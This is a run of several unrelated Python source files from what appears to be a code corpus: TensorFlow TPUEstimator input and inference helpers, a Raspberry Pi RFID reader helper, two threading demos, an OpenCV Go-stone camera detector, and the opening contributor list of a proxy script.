'Please file bug.')
return self._object
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message='Inside scaffold_fn'):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext('Inside Scaffold.finalize'):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def to_control_flow_context_def(self, context_def, export_scope=None):
# pylint: disable=useless-super-delegation
# NOTE(slebedev): the method is required by `ControlFlowContext`.
super(_CapturingContext,
self).to_control_flow_context_def(context_def, export_scope)
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access
raise ValueError('{}: Op {} depends on TPU computation {}, '
'which is not allowed.'.format(self._message, op, c))
def AddValue(self, value):
self.AddOp(value.op)
return value
def __enter__(self):
# pylint: disable=protected-access
self._g = tf.compat.v1.get_default_graph()
self._old = self._g._get_control_flow_context()
self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
'bug')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.DatasetV2):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer(self):
"""Returns the dataset's initializer.
The initializer must be run before calling `features_and_labels`.
"""
self._iterator = tf.compat.v1.data.make_initializable_iterator(
self._dataset)
return self._iterator.initializer
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must run dataset_initializer '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(self,
dataset,
batch_size,
add_padding=False,
num_invocations_per_step=1):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding))
if num_invocations_per_step == 1:
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
else:
# We append (2 * num_invocations_per_step - 1) batches for exhausting the
# user_provided_dataset and stop properly.
# For example, if num_invocations_per_step is 2, we append 3 additional
# padding batches: b1, b2, b3.
# If user_provided_dataset contains two batches: a1, a2
# Step 1: [a1, a2]
# Step 2: [b1, b2] -> STOP
# If user_provided_dataset contains three batches: a1, a2, a3.
# The training loops:
# Step 1: [a1, a2]
# Step 2: [a3, b1]
# Step 3: [b2, b3] -> STOP.
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
final_batch_dataset = final_batch_dataset.repeat(
2 * num_invocations_per_step - 1)
def _set_mask(data_dict):
signals = data_dict['signals']
signals['padding_mask'] = tf.compat.v1.ones_like(
signals['padding_mask'])
data_dict['signals'] = signals
return data_dict
# Mask out the extra batch.
final_batch_dataset = final_batch_dataset.map(_set_mask)
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
'Internal Error: The previous inputs have not been properly '
'consumed. First call features_and_labels, then call signals.')
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals['features']
labels = inputs_with_signals.get('labels')
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
'Internal Error: The current inputs have not been properly '
'generated. First call features_and_labels, then call signals.')
signals = self._current_inputs['signals']
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
Here we change the data structure in the dataset, such that the return value
is a dictionary now and `features`, `labels`, and `signals` are three
distinguished keys in that dict. This provides a better structure, which
eases the process to decompose the inputs (see `features_and_labels`).
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
# Unpack the single Tensor/dict argument as features. This is required
# for the input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = (
_PaddingSignals.pad_features_and_labels(features, labels,
batch_size))
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
else:
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
padding_mask = None
new_input_dict['signals'] = _StopSignals(
stop=stop, batch_size=batch_size,
padding_mask=padding_mask).as_dict()
return new_input_dict
return _map_fn
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = tf.dtypes.bool
if self._stop:
stopping = tf.ones(shape=shape, dtype=dtype)
else:
stopping = tf.zeros(shape=shape, dtype=dtype)
signals = {'stopping': stopping}
if self._padding_mask is not None:
signals['padding_mask'] = self._padding_mask
return signals
@staticmethod
def as_scalar_stopping_signal(signals):
return tf.identity(signals['stopping'][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
"""Detects whether scalar_stopping_signal indicates stopping."""
if isinstance(scalar_stopping_signal, tf.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express the bool check whether scalar_stopping_signal is True.
return tf.math.logical_and(scalar_stopping_signal,
_StopSignals.STOPPING_SIGNAL)
else:
# For non Tensor case, it is used in SessionRunHook. So, we cannot modify
# the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = tf.compat.v1.shape(
_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = tf.constant(batch_size, tf.dtypes.int32)
check_greater = tf.compat.v1.debugging.assert_greater_equal(
batch_size_tensor,
real_batch_size,
data=(batch_size_tensor, real_batch_size),
message='The real batch size should not be greater than batch_size.')
with tf.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
padding = tf.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = tf.compat.v1.pad(tensor, padding)
padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return tf.nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(real_batch_size, missing_count,
batch_size)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals['padding_mask']
batch_size = tf.compat.v1.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = tf.math.equal(batch_size, tensor.shape[0])
with tf.control_dependencies([check_batch_size]):
return tf.identity(tensor)
def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - tf.math.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
# As we split the Tensors to all TPU cores and concat them back, it is
# important to ensure the real data is placed before padded ones, i.e.,
# order is preserved. By that, the sliced padding mask should have all 0's.
# If this assertion failed, # the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = tf.math.equal(
tf.math.reduce_sum(sliced_padding_mask), 0)
with tf.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals))
is_full_batch = tf.math.equal(tf.math.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is full batch or part of stopping signals, we do
# not need to slice to save performance.
return tf.compat.v1.cond(
tf.math.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)))
return tf.nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [
x for x in tf.nest.flatten(batch_features) if isinstance(x, tf.Tensor)
]
if not tensors:
raise ValueError('Cannot find any Tensor in features dict.')
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
padding_mask = tf.concat([
tf.zeros((real_batch_size,), dtype=tf.dtypes.int32),
tf.ones((missing_count,), dtype=tf.dtypes.int32)
],
axis=0)
padding_mask.set_shape((batch_size,))
return padding_mask
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
'{} The transfer size is larger than the protobuf limit. Please '
'consider to use Tensors with smaller shapes or reduce batch '
'size. Given:\n'
'{}'.format(
message, '\n'.join([
' -- Key: {}, Shape: {}'.format(k, v)
for k, v in tensor_structure.items()
])))
def _add_item_to_params(params, key, value):
"""Adds a new item into `params`."""
if hasattr(params, 'set_hparam'):
# For HParams, we need to use special API.
if key in params:
params.set_hparam(key, value)
else:
params.add_hparam(key, value)
else:
# Now params is Python dict.
params[key] = value
def export_estimator_savedmodel(estimator,
export_dir_base,
serving_input_receiver_fn,
assets_extra=None,
as_text=False,
checkpoint_path=None):
"""Export `Estimator` trained model for TPU inference.
Args:
estimator: `Estimator` with which model has been trained.
export_dir_base: A string containing a directory in which to create
timestamped subdirectories containing exported SavedModels.
serving_input_receiver_fn: A function that takes no argument and returns a
`ServingInputReceiver` or `TensorServingInputReceiver`.
assets_extra: A dict specifying how to populate the assets.extra directory
within the exported SavedModel, or `None` if no extra assets are needed.
as_text: whether to write the SavedModel proto in text format.
checkpoint_path: The checkpoint path to export. If `None` (the default),
the most recent checkpoint found within the model directory is chosen.
Returns:
The string path to the exported directory.
"""
# `TPUEstimator` requires `tpu_config.RunConfig`, so we cannot use
# `estimator.config`.
config = tpu_config.RunConfig(model_dir=estimator.model_dir)
est = TPUEstimator(
estimator._model_fn, # pylint: disable=protected-access
config=config,
params=estimator.params,
use_tpu=True,
train_batch_size=2048, # Does not matter.
eval_batch_size=2048, # Does not matter.
)
return est.export_saved_model(export_dir_base, serving_input_receiver_fn,
assets_extra, as_text, checkpoint_path)
def model_fn_inference_on_tpu(model_fn,
features,
labels=None,
config=None,
params=None,
batch_config=None):
"""Convenience wrapper for export_saved_model API v2 for a model_fn.
It attempts to execute the entire model function on the TPU for prediction.
Note that this does not support features which are SparseTensors. If you have
SparseTensor features, consider partitioning your model function further and
use inference_on_tpu.
Args:
model_fn: the model_fn for which we want to inference on TPU.
features: a tensor or dict of tensors, serves as the feature inputs to the
model.
labels: a tensor or dict of tensors, serves as the labels inputs to the
model.
config: auxiliary config to the Estimator.
params: hparams that we want to pass to the model_fn.
batch_config: a named tuple to wrap the inference batching configuration
inputs.
Returns:
An EstimatorSpec containing the outputs in export_outputs and predictions.
"""
computation, capture = _build_computation_for_inference(
model_fn, labels, config, params)
tensors = call_computation(features, computation, batch_config=batch_config)
estimator_spec, export_outputs_dict, predictions_dict, none_indices = (
capture.get())
predictions_list = tensors[:len(predictions_dict)]
export_outputs_list_without_none = tensors[len(predictions_dict):]
# Reinsert `None`s which we've taken out in
# `_build_computation_for_inference()`.
export_outputs_list = []
while none_indices or export_outputs_list_without_none:
if none_indices and none_indices[0] == len(export_outputs_list):
export_outputs_list.append(None)
none_indices.pop(0)
else:
export_outputs_list.append(export_outputs_list_without_none.pop(0))
# Reconstruct `export_outputs` with updated tensors.
new_export_outputs_dict = tf.nest.pack_sequence_as(export_outputs_dict,
export_outputs_list)
export_outputs = estimator_spec.export_outputs
new_export_outputs = collections.OrderedDict(
(k, _clone_export_output_with_tensors(export_outputs[k], v))
for k, v in six.iteritems(new_export_outputs_dict))
# Reconstruct `predictions` with updated tensors.
new_predictions = tf.nest.pack_sequence_as(predictions_dict, predictions_list)
if (len(new_predictions) == 1 and
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR in new_predictions):
new_predictions = new_predictions[_KEY_WHEN_PREDICTIONS_IS_A_TENSOR]
return estimator_spec._replace(
export_outputs=new_export_outputs, predictions=new_predictions)
def _build_computation_for_inference(model_fn, labels, config, params):
"""Builds the computation with calls the model_fn for inference."""
capture = _CapturedObject()
def computation(computation_input):
"""Computation to be passed to `TPUPartitionedCall()`."""
tpu_computation, tpu_capture = _build_tpu_computation_for_inference(
model_fn, computation_input, labels, config, params)
tensors_on_cpu = tf.compat.v1.tpu.rewrite(tpu_computation)
tpu.prune_unconnected_ops_from_xla(tf.compat.v1.get_default_graph())
(estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict) = (
tpu_capture.get())
predictions_list = tensors_on_cpu[:len(predictions_dict)]
export_outputs_tpu_on_cpu_list = tensors_on_cpu[len(predictions_dict):]
# Reconstruct tensors used in export_outputs, with TPU tensors replaced
# with their CPU counterpart returned from `rewrite_for_inference()`.
# `function.Defun()` does not like `None`s in return values, so we leave
# `None`s out but record their positions for later reconstruction.
export_outputs_list_without_none = []
none_indices = []
for i, t in enumerate(export_outputs_list):
if t is None:
none_indices.append(i)
else:
export_outputs_list_without_none.append(
export_outputs_tpu_on_cpu_list.pop(0))
capture.capture(
(estimator_spec, export_outputs_dict, predictions_dict, none_indices))
return predictions_list + export_outputs_list_without_none
return computation, capture
def _build_tpu_computation_for_inference(model_fn, features, labels, config,
params):
"""Builds the TPU computation for inference on TPU."""
capture = _CapturedObject()
def computation():
"""Compute tpu tensors used in export_outputs.
Passed to rewrite_for_inference so that model_fn will be called under
the rewriting contexts. Only tpu tensors are returned, but export_outputs
and scaffold are captured.
Returns:
A list of Tensors used in export_outputs and not marked for
outside_compilation.
"""
# We should only call model fn once and it should be inside `computation`
# so that building the graph will happen under `rewrite_for_inference`.
model_fn_args = function_utils.fn_args(model_fn)
kwargs = {}
# Makes deep copy with `config` and params` in case user mutates them.
if 'labels' in model_fn_args:
kwargs['labels'] = labels
if 'mode' in model_fn_args:
kwargs['mode'] = model_fn_lib.ModeKeys.PREDICT
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
estimator_spec = model_fn(features, **kwargs)
# We pick the TPU tensors out from `export_output` and later return them
# from `computation` for rewriting.
export_outputs_dict = collections.OrderedDict(
(k, _export_output_to_tensors(v))
for k, v in six.iteritems(estimator_spec.export_outputs))
export_outputs_list = tf.nest.flatten(export_outputs_dict)
export_outputs_tpu_list = [t for t in export_outputs_list if t is not None]
if isinstance(estimator_spec.predictions, dict):
predictions_dict = collections.OrderedDict(
(k, v) for k, v in six.iteritems(estimator_spec.predictions))
else:
predictions_dict = {
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR: estimator_spec.predictions
}
predictions_list = tf.nest.flatten(predictions_dict)
# We cannot return everything we want through the return values, so
# capture the rest here for later use.
capture.capture((estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict))
return predictions_list + export_outputs_tpu_list
return computation, capture
def inference_on_tpu(computation,
inputs_to_tpu,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes=None,
max_enqueued_batches=100):
"""Convenient wrapper for export_saved_model API v2 to wrap TPU computation.
It puts computation on TPU, add batching around it and round robin computation
between TPU cores.
See tpu_estimator_test.py for an example.
Args:
computation: computation to be put on TPU, which takes inputs_to_tpu as
arguments.
inputs_to_tpu: a list of tensors as input to computation.
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this. If None or 0,
no batching will done.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op to
pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to 100.
Returns:
The unbatched computation output Tensors.
"""
def _tpu_call(args):
"""Function to either call or feed into BatchFunction."""
@function.Defun(capture_resource_var_by_value=False)
def tpu_computation():
"""Function to feed into the TPUPartitionedCallOp."""
tensors_on_cpu = tf.compat.v1.tpu.rewrite(computation, args)
tpu.prune_unconnected_ops_from_xla(ops.get_default_graph())
return tensors_on_cpu
return tpu_functional.TPUPartitionedCall(
args=tpu_computation.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_computation.definition.signature.output_arg],
f=tpu_computation)
if not max_batch_size:
return _tpu_call(inputs_to_tpu)
@tf.nondifferentiable_batch_function(num_batch_threads, max_batch_size,
batch_timeout_micros,
allowed_batch_sizes,
max_enqueued_batches)
def batched_tpu_computation(*args):
"""Function to feed into the BatchOp."""
return _tpu_call(args)
return batched_tpu_computation(*inputs_to_tpu)
|
pi_rc522_helper.py
|
#coding=utf-8
from pirc522 import RFID
import time
import struct
from threading import Thread
import inspect
import ctypes
"""
A class is based on pirc522 lib.
You can install pirc522 with pip what the command is ' pip install pi-rc522 '.
@auth - xuwh
@date - 2018-9-9
@git - https://github.com/imaxu
"""
class PI_RC522_Helper():
# 最后读到的十进制卡号
last_uid = None
# 当前卡号
current_uid = None
# RFID instance
rdr = None
# 卡进入事件
on_move_in = None
# 卡移除事件
on_move_out = None
# 监听间隔,类型为浮点小数,单位秒。该参数对读卡精确度有影响,建议在0.25-0.3之间
wait_time = 0.3
def __init__(self):
self.rdr = RFID()
self.last_uid = 0
self.current_uid = 0
def scan(self,onIn,onOut):
self.on_move_in = onIn
self.on_move_out = onOut
scan_thread = Thread(target=self.__scan__)
try:
scan_thread.start()
self.__check__()
except KeyboardInterrupt:
self.__async_raise__(scan_thread.ident, SystemExit)
print("退出读卡进程")
finally:
self.rdr.cleanup()
pass
def __async_raise__(self,tid, exctype):
"""raises the exception, performs cleanup if needed"""
tid = ctypes.c_long(tid)
if not inspect.isclass(exctype):
exctype = type(exctype)
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(exctype))
if res == 0:
raise ValueError("invalid thread id")
elif res != 1:
# """if it returns a number greater than one, you're in trouble,
# and you should call it again with exc=NULL to revert the effect"""
ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)
raise SystemError("PyThreadState_SetAsyncExc failed")
def __scan__(self):
while True:
self.rdr.wait_for_tag()
state,tag_type = self.rdr.request()
if not state:
state,uid = self.rdr.anticoll()
if not state:
self.current_uid = struct.unpack('<L',bytes(uid[0:4]))[0]
continue
self.current_uid = 0
def __check__(self):
while True:
time.sleep(self.wait_time)
if self.current_uid == 0:
if self.current_uid != self.last_uid:
self.last_uid = 0
if self.on_move_out:
self.on_move_out()
else:
if self.current_uid != self.last_uid:
self.last_uid = self.current_uid
if self.on_move_in:
self.on_move_in(self.current_uid)
# test demo
def onCardIn(uid):
print("识别到卡号->",uid)
def onCardOut():
print("<--卡移出")
def main():
helper = PI_RC522_Helper()
helper.scan(onCardIn,onCardOut)
if __name__ == '__main__':
main()
|
demo.py
|
import sys
from threading import Thread
from mypkg.a import absolute, relative
if __name__ == "__main__":
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument("method", choices=["absolute", "relative"],
help="Import type for mypkg.b")
parser.add_argument("--threads", "-t", type=int, default=2,
help="Number of threads to run")
args = parser.parse_args()
sys.setswitchinterval(0.005)
numThreads = args.threads
threads = [None] * numThreads
for i in range(numThreads):
threads[i] = Thread(target=globals()[args.method])
for i in range(numThreads):
threads[i].start()
for i in range(numThreads):
threads[i].join()
# Done here to avoid possible interference with timing-sensitive code above
print(f"\nPython executable: {sys.executable}",
f"\nPython version:\n{sys.version}\n",
sep="")
|
threads_program.py
|
import datetime
import colorama
import random
import time
import threading
def main():
t0 = datetime.datetime.now()
print(colorama.Fore.WHITE + "App started.", flush=True)
data = []
threads = [
threading.Thread(target=generate_data, args=(20, data), daemon=True),
threading.Thread(target=generate_data, args=(20, data), daemon=True),
threading.Thread(target=process_data, args=(40, data), daemon=True),
]
abort_thread = threading.Thread(target=check_cancel, daemon=True)
abort_thread.start()
[t.start() for t in threads]
while any([t.is_alive() for t in threads]):
[t.join(.001) for t in threads]
if not abort_thread.is_alive():
print("Cancelling on your request!", flush=True)
break
dt = datetime.datetime.now() - t0
print(colorama.Fore.WHITE + f"App exiting, total time: {dt.total_seconds():,.2f} sec.", flush=True)
def check_cancel():
print(colorama.Fore.RED + "Press enter to cancel...", flush=True)
input()
def generate_data(num: int, data: list):
for idx in range(1, num + 1):
item = idx * idx
data.append((item, datetime.datetime.now()))
print(colorama.Fore.YELLOW + f" -- generated item {idx}", flush=True)
time.sleep(random.random() + .5)
def process_data(num: int, data: list):
processed = 0
while processed < num:
item = None
if data:
item = data.pop(0)
if not item:
time.sleep(.01)
continue
processed += 1
value = item[0]
t = item[1]
dt = datetime.datetime.now() - t
print(colorama.Fore.CYAN +
f" +++ Processed value {value} after {dt.total_seconds():,.2f} sec.", flush=True)
time.sleep(.5)
if __name__ == '__main__':
main()
|
CameraStoneDetection.py
|
#!/usr/bin/env python
# #############################
# # GO stone camera detection #
# #############################
#
# Licensed under MIT License (MIT)
#
# Copyright (c) 2018 Daniel Springwald | daniel@springwald.de
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import os, sys
from multiprocessing import Process, Manager, Value, Array
from multiprocessing import Pool, Array, Process
from threading import Thread
my_file = os.path.abspath(__file__)
my_path ='/'.join(my_file.split('/')[0:-1])
sys.path.insert(0,my_path + "/libs" )
sys.path.insert(0,my_path + "/libs/opencv" )
# import the necessary packages
from picamera.array import PiRGBArray
from picamera import PiCamera
import time
import cv2
class CameraStoneDetection():
_showImage = True
_camera = None
_rawCapture = None
_stream = None
_cascadeBlack = None
_cascadeWhite = None
_useGrayscale = True;
__cameraResolutionX = 640*2
__cameraResolutionY = 480*2
_windowName = "iGoBot camera";
RectsBlack = [];
RectsWhite = [];
_counter = 0;
_process = None
_released = False
# define settings of brightness and contrast
_settings = [[50,50],[50,30],[50,80],[60,30],[60,50],[60,80],[70,50]];
def __init__(self):
print("camera init")
self.posXFace = -1
self.posYFace = -1
self.InitCamera()
#thread = Thread(target=self._update, args=())
#thread.nice = -20 # -20 high prio, 20 low prio
#thread.start()
#thread.nice = -20
def SetCameraSettings(self, settingsNo):
if (settingsNo >= len(self._settings)):
return False;
self._camera.brightness = self._settings[settingsNo][0];
self._camera.contrast = self._settings[settingsNo][0];
return True;
def detect(self, img, cascade):
rects = cascade.detectMultiScale(img, scaleFactor=1.1, minNeighbors=3, minSize=(int(self.__cameraResolutionX / 30), int( self.__cameraResolutionY / 30)), flags=cv2.CASCADE_SCALE_IMAGE)
if len(rects) == 0:
return []
#rects[:,2:] += rects[:,:2] # convert from [[x,y,h,b]] to [[x1,y1,x2,y2]]
return rects
def draw_rects(self, img, rects, color):
for x, y, b, h in rects:
cv2.rectangle(img, (x, y), (x+b, y+h), color, 4)
def InitCamera(self):
print("camera start")
cv2.destroyAllWindows()
cv2.namedWindow(self._windowName, cv2.WINDOW_NORMAL)
cv2.resizeWindow(self._windowName, 400,300)
# initialize the camera and grab a reference to the raw camera capture
self._camera = PiCamera()
self._camera.resolution = (self.__cameraResolutionX, self.__cameraResolutionY)
self.SetCameraSettings(settingsNo=0);
#self._camera.contrast = 50;
#self._camera.brightness = 50;
self._camera.framerate = 12
self._rawCapture = PiRGBArray(self._camera, size=(self.__cameraResolutionX, self.__cameraResolutionY))
#self._stream = self._camera.capture_continuous(self._rawCapture, format="bgr", use_video_port=True)
# allow the camera to warmup
time.sleep(0.2)
if (self._useGrayscale):
cascade_black_fn = "stoneDetection/black-cascade-grayscale.xml"
cascade_white_fn = "stoneDetection/white-cascade-grayscale.xml"
else:
cascade_black_fn = "stoneDetection/black-cascade.xml"
cascade_white_fn = "stoneDetection/white-cascade.xml"
self._cascadeBlack = cv2.CascadeClassifier(cascade_black_fn)
self._cascadeWhite = cv2.CascadeClassifier(cascade_white_fn)
print("camera start done")
def Update(self):
#global ftimestamp, getFPS
# keep looping infinitely until the thread is stopped
#print ("<<<" , self._stream);
# for f in self._stream:
if (True):
self._camera.capture(self._rawCapture, format="bgr")
#image = rawCapture.array
self._counter = self._counter+1;
#print (self._counter);
if (self._counter > 100):
self._counter = 0;
# grab the frame from the stream and clear the stream in
# preparation for the next frame
#image = f.array
image = self._rawCapture.array
rawImage = image
if (self._useGrayscale):
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
#self_actualFrame = image
self._rawCapture.truncate(0)
self.RectsBlack = self.detect(image, self._cascadeBlack)
self.RectsWhite = self.detect(image, self._cascadeWhite)
if (self._showImage==True):
key = cv2.waitKey(1) & 0xFF
self.draw_rects(rawImage, self.RectsBlack, (0, 0, 0))
self.draw_rects(rawImage, self.RectsWhite, (255, 255, 255))
cv2.putText(rawImage, str(self._counter), (10,50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255))
cv2.imshow(self._windowName, rawImage)
# if the thread indicator variable is set, stop the thread
# and resource camera resources
#if (self._released == True):
#self._stream.close()
#self._rawCapture.close()
#self._camera.close()
#return
#time.sleep(0.01)
#return;
def Release(self):
if (self._released == False):
self._released = True
time.sleep(0.5)
print ("shutting down camera")
#self._stream.close()
self._rawCapture.close()
self._camera.close()
def __del__(self):
self.Release()
import atexit
def exit_handler():
testCamera.Release()
if __name__ == '__main__':
from hardware.Light import Light;
light = Light();
light.On();
testCamera = CameraStoneDetection();
setting = 0;
for c in range(0,1000):
testCamera.Update();
setting = setting+1;
if (testCamera.SetCameraSettings(setting)==False):
setting = 0;
testCamera.SetCameraSettings(setting);
time.sleep(1)
testCamera.Release()
|
proxy.py
|
#!/usr/bin/env python2
# coding:utf-8
# Based on GAppProxy 2.0.0 by Du XiaoGang <dugang.2008@gmail.com>
# Based on WallProxy 0.4.0 by Hust Moon <www.ehust@gmail.com>
# Contributor:
# Phus Lu <phus.lu@gmail.com>
# Hewig Xu <hewigovens@gmail.com>
# Ayanamist Yang <ayanamist@gmail.com>
# V.E.O <V.E.O@tom.com>
# Max Lv <max.c.lv@gmail.com>
# AlsoTang <alsotang@gmail.com>
# Christopher Meng <cickumqt@gmail.com>
# Yonsm Guo <YonsmGuo@gmail.com>
# Parkman <cseparkman@gmail.com>
# Ming Bai <mbbill@gmail.com>
# Bin Yu <yubinlove1991@gmail.com>
# lileixuan <lileixuan@gmail.com>
# Cong Ding <cong@cding.org>
# Zhang Youfu <zhangyoufu@gmail.com>
# Lu Wei <luwei@barfoo>
# Harmony Meow <harmony.meow@gmail.com>
# logostream <logostream@gmail.com>
# Rui Wang <isnowfy@gmail.com>
# Wang Wei Qiang <wwqgtxx@gmail.com>
# Felix Yan <felixonmars@gmail.com>
# QXO <qxodream@gmail.com>
# Geek An <geekan@foxmail.com>
# Poly Rabbit <mcx_221@foxmail.com>
# oxnz <yunxinyi@gmail.com>
# Shusen Liu <liushusen.smart@gmail.com>
